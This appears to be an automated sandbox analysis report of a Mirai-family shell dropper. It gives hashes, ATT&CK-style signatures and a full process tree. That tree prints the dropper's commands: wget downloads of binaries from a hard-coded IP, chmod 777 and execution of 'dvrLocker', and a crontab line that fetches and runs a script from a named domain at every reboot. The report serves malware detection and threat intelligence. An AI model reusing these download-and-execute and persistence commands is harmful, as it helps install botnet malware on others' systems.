Analysis
-
max time kernel
131s -
max time network
150s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
09-11-2024 03:32
Static task
static1
Behavioral task
behavioral1
Sample
becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh
-
Size
923B
-
MD5
5419b553750dc94cb55eecefce2e1950
-
SHA1
bf1c8a80bcecfe13f81279a0392031d661e736ef
-
SHA256
becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049
-
SHA512
fb4d326c895be35fef16ae64708323567f6cbdd66267cb61e5de47e36289189a0295a6fcc2dd8482ab143e022d79ef846da37215735cc84931aafd01b7404d6e
Malware Config
Extracted
mirai
BOTNET
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 27 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodshchmodshchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodshchmodchmodchmodpid process 1698 chmod 1672 chmod 1703 chmod 1728 chmod 1762 chmod 1733 chmod 1738 chmod 1748 chmod 1705 sh 1712 chmod 1750 sh 1787 chmod 1801 chmod 1693 chmod 1743 chmod 1772 chmod 1792 chmod 1718 chmod 1677 chmod 1683 chmod 1767 chmod 1777 chmod 1782 chmod 1794 sh 1688 chmod 1723 chmod 1757 chmod -
Executes dropped EXE 24 IoCs
Processes:
dvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerioc pid process /tmp/lib/dvrLocker 1673 dvrLocker /tmp/lib/dvrLocker 1678 dvrLocker /tmp/lib/dvrLocker 1684 dvrLocker /tmp/lib/dvrLocker 1689 dvrLocker /tmp/lib/dvrLocker 1694 dvrLocker /tmp/lib/dvrLocker 1699 dvrLocker /tmp/lib/dvrLocker 1704 dvrLocker /tmp/lib/dvrLocker 1713 dvrLocker /mnt/dvrLocker 1719 dvrLocker /mnt/dvrLocker 1724 dvrLocker /mnt/dvrLocker 1729 dvrLocker /mnt/dvrLocker 1734 dvrLocker /mnt/dvrLocker 1739 dvrLocker /mnt/dvrLocker 1744 dvrLocker /mnt/dvrLocker 1749 dvrLocker /mnt/dvrLocker 1758 dvrLocker /mnt/dvrLocker 1763 dvrLocker /mnt/dvrLocker 1768 dvrLocker /mnt/dvrLocker 1773 dvrLocker /mnt/dvrLocker 1778 dvrLocker /mnt/dvrLocker 1783 dvrLocker /mnt/dvrLocker 1788 dvrLocker /mnt/dvrLocker 1793 dvrLocker /mnt/dvrLocker 1802 dvrLocker -
Renames itself 3 IoCs
Processes:
dvrLockerdvrLockerdvrLockerpid process 1704 dvrLocker 1749 dvrLocker 1793 dvrLocker -
Unexpected DNS network traffic destination 4 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
Processes:
description ioc Destination IP 185.181.61.24 Destination IP 80.152.203.134 Destination IP 185.181.61.24 Destination IP 5.161.109.23 -
Creates/modifies Cron job 1 TTPs 3 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
crontabcrontabcrontabdescription ioc process File opened for modification /var/spool/cron/crontabs/tmp.YT83ty crontab File opened for modification /var/spool/cron/crontabs/tmp.kafmbq crontab File opened for modification /var/spool/cron/crontabs/tmp.wKc6UU crontab -
Changes its process name 3 IoCs
Processes:
dvrLockerdvrLockerdvrLockerdescription ioc pid process Changes the process name, possibly in an attempt to hide itself /bin/sh /etc/init.d/rcS 1704 dvrLocker Changes the process name, possibly in an attempt to hide itself mini_httpd 1749 dvrLocker Changes the process name, possibly in an attempt to hide itself /bin/busybox ntpd 1793 dvrLocker -
Processes:
lslslslslslslslslslslslslslslslslslslslslslslslslslslslslslsmkdirlslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslsdescription ioc process File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems mkdir File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls -
System Network Configuration Discovery 1 TTPs 6 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
wgetrmwgetrmwgetrmpid process 1676 wget 1680 rm 1722 wget 1726 rm 1766 wget 1770 rm -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes:
becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.shdescription ioc process File opened for modification /tmp/lib/dvrLocker becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh
Processes
-
/tmp/becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh/tmp/becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh1⤵
- Writes file to tmp directory
PID:1495 -
/bin/lsls -l /proc/1/exe2⤵
- Reads runtime system information
PID:1496 -
/bin/lsls -l /proc/10/exe2⤵PID:1497
-
/bin/lsls -l /proc/1024/exe2⤵PID:1498
-
/bin/lsls -l /proc/1029/exe2⤵
- Reads runtime system information
PID:1499 -
/bin/lsls -l /proc/1043/exe2⤵PID:1500
-
/bin/lsls -l /proc/1049/exe2⤵PID:1501
-
/bin/lsls -l /proc/1062/exe2⤵
- Reads runtime system information
PID:1502 -
/bin/lsls -l /proc/1066/exe2⤵
- Reads runtime system information
PID:1503 -
/bin/lsls -l /proc/1068/exe2⤵PID:1504
-
/bin/lsls -l /proc/1071/exe2⤵
- Reads runtime system information
PID:1505 -
/bin/lsls -l /proc/1078/exe2⤵PID:1509
-
/bin/lsls -l /proc/1086/exe2⤵PID:1510
-
/bin/lsls -l /proc/1090/exe2⤵PID:1511
-
/bin/lsls -l /proc/1099/exe2⤵PID:1512
-
/bin/lsls -l /proc/11/exe2⤵PID:1513
-
/bin/lsls -l /proc/1109/exe2⤵
- Reads runtime system information
PID:1514 -
/bin/lsls -l /proc/1119/exe2⤵PID:1515
-
/bin/lsls -l /proc/1123/exe2⤵PID:1516
-
/bin/lsls -l /proc/1127/exe2⤵
- Reads runtime system information
PID:1517 -
/bin/lsls -l /proc/1131/exe2⤵
- Reads runtime system information
PID:1518 -
/bin/lsls -l /proc/1135/exe2⤵
- Reads runtime system information
PID:1519 -
/bin/lsls -l /proc/1139/exe2⤵
- Reads runtime system information
PID:1520 -
/bin/lsls -l /proc/1144/exe2⤵PID:1521
-
/bin/lsls -l /proc/1148/exe2⤵
- Reads runtime system information
PID:1522 -
/bin/lsls -l /proc/1149/exe2⤵
- Reads runtime system information
PID:1523 -
/bin/lsls -l /proc/115/exe2⤵PID:1524
-
/bin/lsls -l /proc/1152/exe2⤵
- Reads runtime system information
PID:1525 -
/bin/lsls -l /proc/1153/exe2⤵PID:1526
-
/bin/lsls -l /proc/1156/exe2⤵
- Reads runtime system information
PID:1527 -
/bin/lsls -l /proc/1163/exe2⤵
- Reads runtime system information
PID:1528 -
/bin/lsls -l /proc/1164/exe2⤵PID:1529
-
/bin/lsls -l /proc/1167/exe2⤵PID:1530
-
/bin/lsls -l /proc/1170/exe2⤵
- Reads runtime system information
PID:1531 -
/bin/lsls -l /proc/1176/exe2⤵PID:1532
-
/bin/lsls -l /proc/1181/exe2⤵PID:1533
-
/bin/lsls -l /proc/1184/exe2⤵
- Reads runtime system information
PID:1534 -
/bin/lsls -l /proc/1186/exe2⤵
- Reads runtime system information
PID:1535 -
/bin/lsls -l /proc/1187/exe2⤵PID:1536
-
/bin/lsls -l /proc/1190/exe2⤵
- Reads runtime system information
PID:1537 -
/bin/lsls -l /proc/1193/exe2⤵PID:1538
-
/bin/lsls -l /proc/1196/exe2⤵PID:1539
-
/bin/lsls -l /proc/12/exe2⤵PID:1540
-
/bin/lsls -l /proc/1236/exe2⤵
- Reads runtime system information
PID:1541 -
/bin/lsls -l /proc/1241/exe2⤵PID:1542
-
/bin/lsls -l /proc/1252/exe2⤵PID:1543
-
/bin/lsls -l /proc/1253/exe2⤵PID:1544
-
/bin/lsls -l /proc/1268/exe2⤵
- Reads runtime system information
PID:1545 -
/bin/lsls -l /proc/1288/exe2⤵
- Reads runtime system information
PID:1546 -
/bin/lsls -l /proc/1289/exe2⤵
- Reads runtime system information
PID:1547 -
/bin/lsls -l /proc/1298/exe2⤵PID:1548
-
/bin/lsls -l /proc/13/exe2⤵PID:1549
-
/bin/lsls -l /proc/130/exe2⤵PID:1550
-
/bin/lsls -l /proc/1305/exe2⤵
- Reads runtime system information
PID:1551 -
/bin/lsls -l /proc/1321/exe2⤵PID:1552
-
/bin/lsls -l /proc/1329/exe2⤵PID:1553
-
/bin/lsls -l /proc/1336/exe2⤵PID:1554
-
/bin/lsls -l /proc/1345/exe2⤵PID:1555
-
/bin/lsls -l /proc/1357/exe2⤵PID:1556
-
/bin/lsls -l /proc/1376/exe2⤵PID:1557
-
/bin/lsls -l /proc/14/exe2⤵PID:1558
-
/bin/lsls -l /proc/1479/exe2⤵PID:1559
-
/bin/lsls -l /proc/1480/exe2⤵PID:1560
-
/bin/lsls -l /proc/1483/exe2⤵PID:1561
-
/bin/lsls -l /proc/1485/exe2⤵PID:1562
-
/bin/lsls -l /proc/1486/exe2⤵PID:1563
-
/bin/lsls -l /proc/1495/exe2⤵
- Reads runtime system information
PID:1564 -
/bin/lsls -l /proc/15/exe2⤵PID:1565
-
/bin/lsls -l /proc/16/exe2⤵PID:1566
-
/bin/lsls -l /proc/163/exe2⤵PID:1567
-
/bin/lsls -l /proc/164/exe2⤵PID:1568
-
/bin/lsls -l /proc/165/exe2⤵
- Reads runtime system information
PID:1569 -
/bin/lsls -l /proc/166/exe2⤵
- Reads runtime system information
PID:1570 -
/bin/lsls -l /proc/167/exe2⤵
- Reads runtime system information
PID:1571 -
/bin/lsls -l /proc/168/exe2⤵PID:1572
-
/bin/lsls -l /proc/169/exe2⤵PID:1573
-
/bin/lsls -l /proc/17/exe2⤵
- Reads runtime system information
PID:1574 -
/bin/lsls -l /proc/170/exe2⤵
- Reads runtime system information
PID:1575 -
/bin/lsls -l /proc/171/exe2⤵
- Reads runtime system information
PID:1576 -
/bin/lsls -l /proc/172/exe2⤵PID:1577
-
/bin/lsls -l /proc/173/exe2⤵PID:1578
-
/bin/lsls -l /proc/174/exe2⤵
- Reads runtime system information
PID:1579 -
/bin/lsls -l /proc/175/exe2⤵
- Reads runtime system information
PID:1580 -
/bin/lsls -l /proc/176/exe2⤵
- Reads runtime system information
PID:1581 -
/bin/lsls -l /proc/177/exe2⤵PID:1582
-
/bin/lsls -l /proc/178/exe2⤵
- Reads runtime system information
PID:1583 -
/bin/lsls -l /proc/179/exe2⤵PID:1584
-
/bin/lsls -l /proc/18/exe2⤵
- Reads runtime system information
PID:1585 -
/bin/lsls -l /proc/180/exe2⤵PID:1586
-
/bin/lsls -l /proc/182/exe2⤵
- Reads runtime system information
PID:1587 -
/bin/lsls -l /proc/19/exe2⤵
- Reads runtime system information
PID:1588 -
/bin/lsls -l /proc/2/exe2⤵PID:1589
-
/bin/lsls -l /proc/20/exe2⤵
- Reads runtime system information
PID:1590 -
/bin/lsls -l /proc/207/exe2⤵
- Reads runtime system information
PID:1591 -
/bin/lsls -l /proc/208/exe2⤵
- Reads runtime system information
PID:1592 -
/bin/lsls -l /proc/21/exe2⤵PID:1593
-
/bin/lsls -l /proc/22/exe2⤵
- Reads runtime system information
PID:1594 -
/bin/lsls -l /proc/23/exe2⤵PID:1595
-
/bin/lsls -l /proc/24/exe2⤵PID:1596
-
/bin/lsls -l /proc/242/exe2⤵PID:1597
-
/bin/lsls -l /proc/25/exe2⤵PID:1598
-
/bin/lsls -l /proc/26/exe2⤵PID:1599
-
/bin/lsls -l /proc/27/exe2⤵PID:1600
-
/bin/lsls -l /proc/273/exe2⤵PID:1601
-
/bin/lsls -l /proc/28/exe2⤵PID:1602
-
/bin/lsls -l /proc/29/exe2⤵PID:1603
-
/bin/lsls -l /proc/3/exe2⤵
- Reads runtime system information
PID:1604 -
/bin/lsls -l /proc/30/exe2⤵PID:1605
-
/bin/lsls -l /proc/31/exe2⤵PID:1606
-
/bin/lsls -l /proc/32/exe2⤵PID:1607
-
/bin/lsls -l /proc/322/exe2⤵PID:1608
-
/bin/lsls -l /proc/325/exe2⤵
- Reads runtime system information
PID:1609 -
/bin/lsls -l /proc/34/exe2⤵
- Reads runtime system information
PID:1610 -
/bin/lsls -l /proc/35/exe2⤵
- Reads runtime system information
PID:1611 -
/bin/lsls -l /proc/36/exe2⤵PID:1612
-
/bin/lsls -l /proc/4/exe2⤵PID:1613
-
/bin/lsls -l /proc/417/exe2⤵PID:1614
-
/bin/lsls -l /proc/425/exe2⤵
- Reads runtime system information
PID:1615 -
/bin/lsls -l /proc/428/exe2⤵
- Reads runtime system information
PID:1616 -
/bin/lsls -l /proc/444/exe2⤵PID:1617
-
/bin/lsls -l /proc/452/exe2⤵PID:1618
-
/bin/lsls -l /proc/457/exe2⤵PID:1619
-
/bin/lsls -l /proc/464/exe2⤵
- Reads runtime system information
PID:1620 -
/bin/lsls -l /proc/465/exe2⤵PID:1621
-
/bin/lsls -l /proc/468/exe2⤵PID:1622
-
/bin/lsls -l /proc/469/exe2⤵PID:1623
-
/bin/lsls -l /proc/477/exe2⤵PID:1624
-
/bin/lsls -l /proc/488/exe2⤵
- Reads runtime system information
PID:1625 -
/bin/lsls -l /proc/490/exe2⤵PID:1626
-
/bin/lsls -l /proc/495/exe2⤵PID:1627
-
/bin/lsls -l /proc/496/exe2⤵PID:1628
-
/bin/lsls -l /proc/499/exe2⤵
- Reads runtime system information
PID:1629 -
/bin/lsls -l /proc/5/exe2⤵
- Reads runtime system information
PID:1630 -
/bin/lsls -l /proc/516/exe2⤵PID:1631
-
/bin/lsls -l /proc/518/exe2⤵PID:1632
-
/bin/lsls -l /proc/545/exe2⤵PID:1633
-
/bin/lsls -l /proc/551/exe2⤵
- Reads runtime system information
PID:1634 -
/bin/lsls -l /proc/562/exe2⤵PID:1635
-
/bin/lsls -l /proc/586/exe2⤵PID:1636
-
/bin/lsls -l /proc/6/exe2⤵
- Reads runtime system information
PID:1637 -
/bin/lsls -l /proc/606/exe2⤵PID:1638
-
/bin/lsls -l /proc/608/exe2⤵PID:1639
-
/bin/lsls -l /proc/633/exe2⤵PID:1640
-
/bin/lsls -l /proc/641/exe2⤵
- Reads runtime system information
PID:1641 -
/bin/lsls -l /proc/644/exe2⤵
- Reads runtime system information
PID:1642 -
/bin/lsls -l /proc/673/exe2⤵PID:1643
-
/bin/lsls -l /proc/680/exe2⤵
- Reads runtime system information
PID:1644 -
/bin/lsls -l /proc/683/exe2⤵
- Reads runtime system information
PID:1645 -
/bin/lsls -l /proc/7/exe2⤵PID:1646
-
/bin/lsls -l /proc/710/exe2⤵
- Reads runtime system information
PID:1647 -
/bin/lsls -l /proc/715/exe2⤵PID:1648
-
/bin/lsls -l /proc/722/exe2⤵PID:1649
-
/bin/lsls -l /proc/78/exe2⤵PID:1650
-
/bin/lsls -l /proc/79/exe2⤵PID:1651
-
/bin/lsls -l /proc/8/exe2⤵PID:1652
-
/bin/lsls -l /proc/80/exe2⤵PID:1653
-
/bin/lsls -l /proc/81/exe2⤵
- Reads runtime system information
PID:1654 -
/bin/lsls -l /proc/82/exe2⤵PID:1655
-
/bin/lsls -l /proc/83/exe2⤵
- Reads runtime system information
PID:1656 -
/bin/lsls -l /proc/84/exe2⤵
- Reads runtime system information
PID:1657 -
/bin/lsls -l /proc/85/exe2⤵PID:1658
-
/bin/lsls -l /proc/89/exe2⤵PID:1659
-
/bin/lsls -l /proc/9/exe2⤵PID:1660
-
/bin/lsls -l /proc/908/exe2⤵PID:1661
-
/bin/lsls -l /proc/953/exe2⤵PID:1662
-
/bin/lsls -l /proc/957/exe2⤵PID:1663
-
/bin/lsls -l /proc/962/exe2⤵
- Reads runtime system information
PID:1664 -
/bin/lsls -l /proc/966/exe2⤵PID:1665
-
/bin/lsls -l /proc/969/exe2⤵PID:1666
-
/bin/lsls -l /proc/98/exe2⤵PID:1667
-
/bin/rmrm -rf /tmp/lib/2⤵PID:1668
-
/bin/rmrm -rf /tmp/lib/dvrLocker2⤵PID:1669
-
/bin/mkdirmkdir /tmp/lib/2⤵
- Reads runtime system information
PID:1670 -
/usr/bin/wgetwget http://45.202.35.91/tmpsl -O -2⤵PID:1671
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1672 -
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1673 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:1673
-
/bin/rmrm -rf tmpsl2⤵PID:1675
-
/usr/bin/wgetwget http://45.202.35.91/tmips -O -2⤵
- System Network Configuration Discovery
PID:1676 -
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1677 -
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1678 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:1678
-
/bin/rmrm -rf tmips2⤵
- System Network Configuration Discovery
PID:1680 -
/usr/bin/wgetwget http://45.202.35.91/tarm -O -2⤵PID:1681
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1683 -
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1684 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:1684
-
/bin/rmrm -rf tarm2⤵PID:1686
-
/usr/bin/wgetwget http://45.202.35.91/tarm5 -O -2⤵PID:1687
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1688 -
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1689 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:1689
-
/bin/rmrm -rf tarm52⤵PID:1691
-
/usr/bin/wgetwget http://45.202.35.91/tppc -O -2⤵PID:1692
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1693 -
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1694 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:1694
-
/bin/rmrm -rf tppc2⤵PID:1696
-
/usr/bin/wgetwget http://45.202.35.91/tarm7 -O -2⤵PID:1697
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1698 -
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1699 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:1699
-
/bin/rmrm -rf tarm72⤵PID:1701
-
/usr/bin/wgetwget http://45.202.35.91/x86 -O -2⤵PID:1702
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1703 -
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
- Renames itself
- Changes its process name
PID:1704 -
/bin/shsh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"3⤵
- File and Directory Permissions Modification
PID:1705 -
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:1707 -
/usr/bin/crontabcrontab -l4⤵PID:1708
-
/bin/rmrm -rf x862⤵PID:1710
-
/usr/bin/wgetwget http://45.202.35.91/tarm6 -O -2⤵PID:1711
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1712 -
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1713 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:1713
-
/bin/rmrm -rf tarm62⤵PID:1715
-
/bin/rmrm -rf /mnt/dvrLocker2⤵PID:1716
-
/usr/bin/wgetwget http://45.202.35.91/tmpsl -O -2⤵PID:1717
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1718 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1719 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:1719
-
/bin/rmrm -rf tmpsl2⤵PID:1721
-
/usr/bin/wgetwget http://45.202.35.91/tmips -O -2⤵
- System Network Configuration Discovery
PID:1722 -
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1723 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1724 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:1724
-
/bin/rmrm -rf tmips2⤵
- System Network Configuration Discovery
PID:1726 -
/usr/bin/wgetwget http://45.202.35.91/tarm -O -2⤵PID:1727
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1728 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1729 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:1729
-
/bin/rmrm -rf tarm2⤵PID:1731
-
/usr/bin/wgetwget http://45.202.35.91/tarm5 -O -2⤵PID:1732
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1733 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1734 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:1734
-
/bin/rmrm -rf tarm52⤵PID:1736
-
/usr/bin/wgetwget http://45.202.35.91/tppc -O -2⤵PID:1737
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1738 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1739 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:1739
-
/bin/rmrm -rf tppc2⤵PID:1741
-
/usr/bin/wgetwget http://45.202.35.91/tarm7 -O -2⤵PID:1742
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1743 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1744 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:1744
-
/bin/rmrm -rf tarm72⤵PID:1746
-
/usr/bin/wgetwget http://45.202.35.91/x86 -O -2⤵PID:1747
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1748 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
- Renames itself
- Changes its process name
PID:1749 -
/bin/shsh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"3⤵
- File and Directory Permissions Modification
PID:1750 -
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:1752 -
/usr/bin/crontabcrontab -l4⤵PID:1753
-
/bin/rmrm -rf x862⤵PID:1755
-
/usr/bin/wgetwget http://45.202.35.91/tarm6 -O -2⤵PID:1756
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1757 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1758 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:1758
-
/bin/rmrm -rf tarm62⤵PID:1760
-
/usr/bin/wgetwget http://45.202.35.91/tmpsl -O -2⤵PID:1761
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1762 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1763 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:1763
-
/bin/rmrm -rf tmpsl2⤵PID:1765
-
/usr/bin/wgetwget http://45.202.35.91/tmips -O -2⤵
- System Network Configuration Discovery
PID:1766 -
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1767 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1768 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:1768
-
/bin/rmrm -rf tmips2⤵
- System Network Configuration Discovery
PID:1770 -
/usr/bin/wgetwget http://45.202.35.91/tarm -O -2⤵PID:1771
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1772 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1773 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:1773
-
/bin/rmrm -rf tarm2⤵PID:1775
-
/usr/bin/wgetwget http://45.202.35.91/tarm5 -O -2⤵PID:1776
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1777 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1778 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:1778
-
/bin/rmrm -rf tarm52⤵PID:1780
-
/usr/bin/wgetwget http://45.202.35.91/tppc -O -2⤵PID:1781
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1782 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1783 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:1783
-
/bin/rmrm -rf tppc2⤵PID:1785
-
/usr/bin/wgetwget http://45.202.35.91/tarm7 -O -2⤵PID:1786
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1787 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1788 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:1788
-
/bin/rmrm -rf tarm72⤵PID:1790
-
/usr/bin/wgetwget http://45.202.35.91/x86 -O -2⤵PID:1791
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1792 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
- Renames itself
- Changes its process name
PID:1793 -
/bin/shsh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"3⤵
- File and Directory Permissions Modification
PID:1794 -
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:1796 -
/usr/bin/crontabcrontab -l4⤵PID:1797
-
/bin/rmrm -rf x862⤵PID:1799
-
/usr/bin/wgetwget http://45.202.35.91/tarm6 -O -2⤵PID:1800
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1801 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1802 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:1802
-
/bin/rmrm -rf tarm62⤵PID:1804
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
